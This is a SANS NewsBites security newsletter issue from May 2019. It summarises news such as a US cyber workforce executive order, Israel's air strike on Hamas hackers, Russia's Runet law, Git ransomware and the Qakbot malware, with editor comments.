OnDemand Includes 4 Months Access to Course Content - Special Offers Available Now!

Newsletters: NewsBites

Subscribe to SANS Newsletters

Join the SANS Community to receive the latest curated cyber security news, vulnerabilities and mitigations, training opportunities, and our webcast schedule.

SANS NewsBites
@Risk: Security Alert
OUCH! Security Awareness
Case Leads DFIR Digest
Industrial Control Systems
Industrials & Infrastructure

SANS NewsBites is a semiweekly high-level executive summary of the most important news articles that have been published on computer security during the last week. Each news item is very briefly summarized and includes a reference on the web for detailed information, if possible.

Spend five minutes per week to keep up with the high-level perspective of all the latest security news. New issues are delivered free every Tuesday and Friday.

Volume XXI - Issue #36

May 7, 2019

Finding Cyber Aptitude in the US - the Cyber Executive Order; Air Strike Response to Cyber Attack; Putin's Great Wall of Russia for Cyber

Students at 1,240 U.S. colleges (24% of all U.S. colleges) are participating in Cyber Fast Track, competing to show they have the aptitude and grit to win more than $2 million in scholarships for SANS classes as well as hundreds of thousands in scholarships at their schools. The deadline for entries is this Friday, May 10. More than 5,000 students (out of the 12,500 who have tried) have already done well enough to move into round two of the program. America's most desirable cybersecurity employers are planning internships for high performers, and the colleges appreciate the program because it identifies great talent in their own student bodies for part time jobs in IT and IT security at school.




SANS NewsBites                 May 7, 2019                 Vol. 21, Num. 036




  Cybersecurity Executive Order

  Israel Responded to Cyberattacks with Air Strike: Real-time Hybrid Warfare

  Putin Signs Law to Create Isolated Russian Internet


  "Cyber Event" Disrupted Power Grid Operations in Western US in March

  Git Ransomware

  Supply Chain Hackers Eroding Trust in Software Distribution Systems

  Qakbot Uses Obfuscation to Maintain Persistence

  International Law Enforcement Authorities Take Down Dark Web Marketplaces

  Agency Cybersecurity Leaders Response to Shared Services Policy

  Firefox and Certificate Expiration

  Google Access Transparency for Cloud Services

  Microsoft is Offering Free Election Security Tools




-- SANSFIRE 2019 | Washington, DC | June 15-22 | https://www.sans.org/event/sansfire-2019

-- SANS Amsterdam May 2019 | May 20-25 | https://www.sans.org/event/amsterdam-may-2019

-- SANS San Antonio 2019 | May 28-June 2 | https://www.sans.org/event/san-antonio-2019

-- SANS London June 2019 | June 3-8 | https://www.sans.org/event/london-june-2019

-- Enterprise Defense Summit & Training 2019 | Redondo Beach, CA | June 3-10 | https://www.sans.org/event/enterprise-defense-summit-2019

-- Security Operations Summit 2019 | New Orleans, LA | June 24-July 1 | https://www.sans.org/event/security-operations-summit-2019

-- SANS Cyber Defence Canberra 2019 | June 24-July 13 | https://www.sans.org/event/cyber-defence-canberra-2019

-- SANS Cyber Defence Japan 2019 | July 1-13 | https://www.sans.org/event/cyber-defence-japan-2019

-- SANS Rocky Mountain 2019 | Denver, CO | July 15-20 | https://www.sans.org/event/rocky-mountain-2019

-- SANS OnDemand and vLive Training

Get an iPad, Samsung Galaxy Tab A, or $250 Off with OnDemand or vLive training. Offer ends May 15.


-- Can't travel? SANS offers online instruction for maximum flexibility

-- Live Daytime training with Simulcast - https://www.sans.org/simulcast

-- Evening training 2x per week for 6 weeks with vLive | https://www.sans.org/vlive

-- Anywhere, Anytime access for 4 months with OnDemand format | https://www.sans.org/ondemand/

Single Course Training

-- Single Course Training

SANS Mentor | https://www.sans.org/mentor/about

Community SANS | https://www.sans.org/community/


-- View the full SANS course catalog and Cyber Security Skills Roadmap



***************************  Sponsored By Splunk  ******************************

Take Your SIEM to the Cloud.  A SIEM solution is like a radar system. Without one, IT is flying blind and organizations are vulnerable to cyberthreats. But a cloud-based SIEM solution could add even more benefits to an organization's security defenses. Download Take Your SIEM to the Cloud to learn how to improve your security posture using a cloud-based SIEM. http://www.sans.org/info/212670




--Cybersecurity Executive Order

(May 2 & 3, 2019)

The goal of the recently-issued White House Executive Order on cybersecurity is to develop a "superior cybersecurity workforce," according to an administration official. The order calls for the Homeland Security Secretary to establish a job rotation program to allow cybersecurity experts move between agencies. It directs the Office of Personnel management (OPM) to create a list of tests that can be used to evaluate federal employees and identify those with cybersecurity skills. It also seeks to establish a cybersecurity competition open to government workers and members of the armed services.

[Editor Comments]

[Paller] There is a very big idea in the Executive Order. That is the aptitude testing. The Brits discovered two sources of extremely high talent that is ready and has not been tapped. One source is adults who are already employed in the workforce but not in IT roles and who have extraordinary aptitude for solving cyber security problems. The second is students in college or high school who never got introduced to tech who also have the curiosity and tenacity and problem-solving and quick learning that separates the great cyber security professionals from the ones who just keep doing what doesn't work. Aptitude identification programs for both groups worked wonderfully in the UK and have been tested at scale in the United States. Preliminary data shows they will work as well here as they do in the UK. The Federal government is leading the quest to make aptitude testing programs work, and the Executive Order shines a bright light on their promise. The key to the importance of aptitude testing is that a great number of people who are in the cyber security field do not have the natural aptitude to work on the front lines of cybersecurity -- identifying and excising intrusions. Their aptitude deficit leaves countries and companies deeply at risk. Programs that identify natural talent combined with great training is the shortest path to solving our country's high-end cyber security skills shortage.

UK Success adults: https://www.infosecurity-magazine.com/news-features/all-you-need-cyber-retraining/: All You Need to Know about the Cyber Retraining Academy

US test adults: https://www.fedscoop.com/cyber-reskilling-academy-1500-applicants/:More than 1,500 feds applied for first Cyber Reskilling Academy cohort

Students: www.girlsgocyberstart.org and www.cyber-fasttrack.org

[Williams] The executive order seems to be a mixed bag. On the one hand, it highlights the need for aptitude assessments and retraining. That's extremely positive. On the other hand, it establishes a "president's cup" cybersecurity competition. I'm rather concerned that the results of this will be skewed against some classified organizations who must adapt to use unclassified tools and techniques in the competition.

Read more in:

Bank InfoSecurity: Trump Order Aims to Boost Federal Cybersecurity Workforce


The Register: White House issues Executive Order on cybersecurity, including hacker Hunger Games


Cyberscoop: Trump emphasizes federal cybersecurity workforce, education programs in new executive order


Threatpost: Researchers Weigh in on Trump's Cyber Workforce Executive Order


White House: Executive Order on America's Cybersecurity Workforce



--Israel Responded to Cyberattacks with Air Strike: Real-time Hybrid Warfare

(May 5 & 6, 2019)

The Israeli Defense Force (IDF) bombed a building it said housed Hamas cyberspecialists who had attempted to launch an attack that Israeli forces thwarted. The air strike is believed to be the first real-time kinetic response to a cyberattack. In 2016, NATO declared cyber a battlefield.

[Editor Comments]

[Williams] This action puts many in the line of fire who really haven't been before. If the "cyber is a battlefield and anyone on the battlefield is a combatant" position is widely adopted, cyber defenders will be at risk of bodily harm too. In other words, don't just view this as part of the Hamas/IDF conflict - view it in the larger context of what it will mean if taken to include cyber defense operators as well.

Read more in:

Wired: What Israel's Strike on Hamas Hackers Means for Cyberwar


ZDNet: In a first, Israel responds to Hamas hackers with an air strike


CNBC: Israel says it bombed Hamas compound that committed cyberattacks


Softpedia: NATO Declares Cyber an Official Warfare Battleground, Next to Air, Sea and Land (June 2016)



--Putin Signs Law to Create Isolated Russian Internet

(May 2, 2019)

Russian President Vladimir Putin has signed the Runet law, which would allow Russia to create its own Internet that operates independently from the rest of the world. The purported goal of the law is to protect the stability of Russia's Internet in the event that foreign adversaries attempt to cut it off from the rest of the world. The law takes effect in November and telecommunications operators must comply with the law's provisions starting in 2021.

[Editor Comments]

[Pescatore] Not really much detail on this, but it sounds more like an attempt to replicate the "Great Firewall of China" approach to censoring Internet access vs. some sort of security strategy. In fact, it seems like recycling of the old USSR communications restrictions that were lifted in 1987 or so. Four years later the Berlin Wall came down, and this strategy seems like at attempt to put back up the cyber version.

[Neely] Putin has a model that Russia could "pull the plug" on the rest of the Internet so Russia could survive a Cyber War, routing traffic through Russian exchange points when they are under threat. Given that Internet threats are a constant, expect traffic to always be routed through these exchange points, creating a model that will resemble the "Great Firewall of China" which facilitates enacting communication restrictions. There are better strategies for creating and securing defenses of critical resources.


[Murray] Recall when there were tanks in Red Square and the only Internet connection to Moscow was a dial connection through Finland. The value of a network is an exponential function of the numbers of nodes and potential connections. Attempts to limit the connections reduce the value by the same function.  

Read more in:

ZDNet: Putin signs Runet law to cut Russia's internet off from rest of world


The Hill: Putin signs controversial internet law


****************************  SPONSORED LINKS  ******************************

1) Ponemon Report: 2019 State of Password and Authentication Security Behaviors.  Read the surprising statistics. http://www.sans.org/info/212675

2) Take the 2019 SANS Integrated Incident Response Survey and enter for a chance to win a $400 Amazon gift card: http://www.sans.org/info/212680

3)  How is your organization responding to the threats that matter? Take this SANS survey and enter for a chance to win a $400 Amazon gift card: http://www.sans.org/info/212695




--"Cyber Event" Disrupted Power Grid Operations in Western US in March

(April 30, May 2 & 3, 2019)

A report posted by the US Department of Energy says that a "cyber event" disrupted power grid operations in California, Utah, and Wyoming in early March. The issue "did not impact generation, the reliability of the grid or cause any customer outages." The cyber event involved a denial of service condition caused via a known vulnerability.

Read more in:

E&E News: 'Denial of service' attack caused grid cyber disruption: DOE


E&E News: OE-417 Electric Emergency and Disturbance Report - Calendar Year 2019 (see page 5: 03/05/2019) (PDF)


SC Magazine: Denial of service event impacted U.S. power utility last month


Tech Crunch: 'Denial of service condition' disrupted US energy company operations


CNBC: An alarmingly simple cyberattack hit electrical systems serving LA and Salt Lake, but power never went down


Vice: A 'Cyber Event' Disrupted the Power Grid in California and Wyoming, But Don't Panic Just Yet



--Git Ransomware

(May 3, 2019)

Hackers have been infecting code repositories with ransomware, wiping code and commits and replacing them with a text file ransom demand for Bitcoin. The hackers have targeted users on GitHub, GitLab, and Bitbucket. It is not clear how the attackers gained access to the accounts.  

Read more in:

The Register: Mystery Git ransomware appears to blank commits, demands Bitcoin to rescue code


Bleeping Computer: Attackers Wiping GitHub and GitLab Repos, Leave Ransom Notes


Vice: Someone Is Hacking GitHub Repositories and Holding Code Ransom



--Supply Chain Hackers Eroding Trust in Software Distribution Systems

(May 3, 2019)

Over the past three years, a group of hackers known by several names, including Barium ShadowHammer, and Wicked Panda, have infected software distribution systems at at least six different companies. The group's approach is to infect large numbers of users through these software distribution channels, and then cull the victims for the targets of their espionage efforts. If the group had chosen to distribute ransomware through the infected computers, the results would have been devastating.

[Editor Comments]

[Pescatore] This is a good article to use as the basis of a table top exercise to demonstrate to CEOs and Boards of Directors why the security team should be involved in procurement/supply chain/merger and acquisition decisions. Companies that have done so, and who have invested in the tools and skills to actually make sure software products and services been assessed for malicious capabilities before acquisition have been able to avoid or minimize damage from similar supply chain attacks.

Read more in:

Wired: A Mysterious Hacker Group is on a Supply Chain Hijacking Spree



--Qakbot Uses Obfuscation to Maintain Persistence

(May 2 & 3, 2019)

A new variant of the Qakbot or Qbot banking trojan uses new obfuscation tools to evade detection and make itself more difficult to remove from infected devices. Victims are first infected with a dropper. The compromised device then creates scheduled tasks to download portions of the Qakbot malware which are then put together. Qakbot has a history of using scheduled tasks to maintain a foothold in infected devices.  

[Editor Comments]

[Murray] If your systems are compromised, they are compromised. There is little to choose among the capabilities of the malicious software. We must know what software we expect to be on our systems if we expect to recognize that which we do not want.  

Read more in:

Talos Intelligence: Qakbot levels up with new obfuscation techniques


SC Magazine: Qakbot upgrade includes new obfuscation technique


Bleeping Computer: Qakbot Assembles Itself from Encrypted Halves to Evade Detection



--International Law Enforcement Authorities Take Down Dark Web Marketplaces

(May 3 & 6, 2019)

Two dark web marketplaces - the Wall Street Market (WSM) and the Silkkitie or Valhalla Marketplace - have been taken down in an international coordinated effort involving Europol and German, Dutch, US, Finnish, and French authorities. Three suspects are in custody in Germany; they face charges in the US related to their alleged operation of the WSM.

Read more in:

Europol: Double Blow to Dark Web Marketplaces


KrebsOnSecurity: Feds Bust Up Dark Web Hub Wall Street Market


MeriTalk: DoJ Charges Three Germans for Operating Dark Web Marketplace


Justice: 3 Germans Who Allegedly Operated Dark Web Marketplace with Over 1 Million Users Face U.S. Narcotics and Money Laundering Charges



--Agency Cybersecurity Leaders Response to Shared Services Policy

(May 1, 2019)

On April 26, the US Office of Management and Budget (OMB) issued a new shared services policy that designates the Department of Homeland Security (DHS) as the Quality Service Management Office (QSMO) in charge of cybersecurity acquisition and standards. At a roundtable discussion last week, information security leaders at US government agencies say that they are fine with the designation provided DHS works with agencies individually.

Read more in:

Nextgov: Agency Cyber Pros Welcome DHS' Leadership If It's Not One-Size-Fits-All


Nextgov: Exclusive: What OMB's New Shared Services Policy Will Mean for Modernization



--Firefox and Certificate Expiration

(May 5, 2019)

Mozilla has released out an updated version of Firefox to address a problem involving an expired intermediate signing certificate that disabled most plug-ins and extensions. Users should update to Firefox version 66.0.4.

[Editor Comments]

[Neely] The problem manifests itself by unexpectedly disabling extensions, and users cannot reinstall or re-enable them. Enterprises need to deploy version 60.6.2 ESR, or enable Firefox Studies, which also requires enabling sending telemetry data back to Mozilla, to resolve the problem.

Read more in:

ZDNet: Mozilla releases Firefox 66.0.4 with fix disabled add-ons issue


Bleeping Computer: Firefox 66.0.4 Released With Fix for Disabled Addons



--Google Access Transparency for Cloud Services

(March 2019)

Google's Access Transparency service allows customers to view service logs related to their accounts. Access Transparency is supported on six different Google Cloud Platform services; there are plans to add support for more services.

[Editor Comments]

[Pescatore] This is a nice step forward in visibility, one that should be budgeted into the acquisition cost of GCP and then all cloud services, as Google competitors announce similar offerings. This is not full visibility into what Google is doing at the bottom layer of virtualization but gives you the ability to examine (and export into SIEM or other analysis packages) all Google admin actions directly related to your services. It requires certain levels of Google support packages and roles - it is not free, thus the need to push for IT to budget in that cost as part of acquiring the services.

[Neely] Increased transparency to what CSP System Administrators are doing with your account allows equivalent visibility to actions taken by staff on internally hosted systems. Microsoft is putting a toe in the water with their Customer Lockbox for Office 365. Google's offering is available only to customers with Gold, Platinum, Enterprise, four or more Development roles, four or more Production roles, or a combination of the two role-based support agreements.

[Murray] As with other such services, pay for them only if you look at the data. Continue to pay only if you find intelligence in the data on which you take action.

Read more in:

Search Cloud Computing: Google tool signals move to greater cloud transparency


Google: Access Transparency



--Microsoft is Offering Free Election Security Tools

(May 6, 2019)

Microsoft plans to release a free open-source software development kit that can be used to help improve election security. ElectionGuard will be available later this summer to election officials and election technology suppliers. ElectionGuard can be used to allow third-party election result validation and to allow voters to check that their ballots were counted correctly.

[Editor Comments]

[Pescatore] Microsoft's partner in this, a small research company called Galois, has been funded by DARPA in this area since 2017 under the System Security Through Integrated Hardware and Firmware program. If the ElectionGuard software is released on GitHub soon, it will be good to see it banged on by security researchers and at the DefCon Voting Village in August. Microsoft also listed as a partner Election Systems & Software, the election system company who last year admitted that from 2000 - 2006 they included modems and PC Anywhere remote access software in systems they sold that were used to program voting machines and tabulate votes! States and localities that procure voting systems should look for the results of testing and integration of technology like ElectionGuard from all system vendors.

[Neely] Tools to help secure systems and validate the results are definitely needed. Resources to update and secure voting systems will need to be identified and budgets will need to be adjusted for systems that were intended to operate without significant change for 20-30 years.


[Murray] While there are thousands of jurisdictions conducting our elections, there are only a handful selling hardware and software into this market. Seems as though this is a more efficient place to focus security efforts. The vendors do not have a good security record. One would like to see those who are building ATMs and gambling devices in the market.

Read more in:

Microsoft: Protecting democratic elections through secure, verifiable voting


Cyberscoop: Microsoft pushes open-source software kit to election agencies, voting-tech vendors




Decoding UTF-16 in UDF Files


Git Ransomware


DLink Ransomware Patch (German)


Jenkins Plugin Vulnerabilities


Malicious WPAD Domains


VMWare Fusion 11 Guest VM RCE


Hackers Are Using Bad Passwords Too


Amazon S3 Discontinues Path Style Access



The Editorial Board of SANS NewsBites


John Pescatore was Vice President at Gartner Inc. for fourteen years. He became a director of the SANS Institute in 2013. He has worked in computer and network security since 1978 including time at the NSA and the U.S. Secret Service.

Shawn Henry is president of CrowdStrike Services. He retired as FBI Executive Assistant Director responsible for all criminal and cyber programs and investigations worldwide, as well as international operations and the FBI's critical incident response.

Suzanne Vautrinot was Commander of the 24th Air Force (AF Cyber) and now sits on the board of directors of Wells Fargo and several other major organizations.

Ed Skoudis is co-founder of CounterHack, the nation's top producer of cyber ranges, simulations, and competitive challenges, now used from high schools to the Air Force. He is also author and lead instructor of the SANS Hacker Exploits and Incident Handling course, and Penetration Testing course.

Michael Assante was Vice President and Chief Security Officer at NERC, led a key control systems group at Idaho National Labs, and was American Electric Power's CSO. He now leads the global cyber skills development program at SANS for power, oil & gas and other critical infrastructure industries.

Mark Weatherford is Chief Cybersecurity Strategist at vArmour and the former Deputy Under Secretary of Cybersecurity at the US Department of Homeland Security.

Stephen Northcutt teaches advanced courses in cyber security management; he founded the GIAC certification and was the founding President of STI, the premier skills-based cyber security graduate school, www.sans.edu.

Dr. Johannes Ullrich is Chief Technology Officer of the Internet Storm Center and Dean of the Faculty of the graduate school at the SANS Technology Institute.

William Hugh Murray is an executive consultant and trainer in Information Assurance and Associate Professor at the Naval Postgraduate School.

Lee Neely is a Senior Cyber Analyst at Lawrence Livermore National Laboratory, SANS Analyst and Mentor. He has worked in computer security since 1989.

Rob Lee is the SANS Institute's top forensics instructor and director of the digital forensics and incident response research and education program at SANS (computer-forensics.sans.org).

Tom Liston is member of the Cyber Network Defense team at UAE-based Dark Matter. He is a Handler for the SANS Institute's Internet Storm Center and co-author of the book Counter Hack Reloaded.

Jake Williams is a SANS course author and the founder of Rendition Infosec, with experience securing DoD, healthcare, and ICS environments.

Dr. Eric Cole is an instructor, author and fellow with The SANS Institute. He has written five books, including Insider Threat and he is a founder with Secure Anchor Consulting.

Mason Brown is one of a very small number of people in the information security field who have held a top management position in a Fortune 50 company (Alcoa). He leads SANS' efforts to raise the bar in cybersecurity education around the world.

David Hoelzer is the director of research & principal examiner for Enclave Forensics and a senior fellow with the SANS Technology Institute.

Gal Shpantzer is a trusted advisor to CSOs of large corporations, technology startups, Ivy League universities and non-profits specializing in critical infrastructure protection. Gal created the Security Outliers project in 2009, focusing on the role of culture in risk management outcomes and contributes to the Infosec Burnout project.

Alan Paller is director of research at the SANS Institute.

Brian Honan is an independent security consultant based in Dublin, Ireland.

David Turley is SANS operations manager and serves as production manager and final editor on SANS NewsBites.

Please feel free to share this with interested parties via email, but no posting is allowed on web sites. For a free subscription visit https://www.sans.org/account/create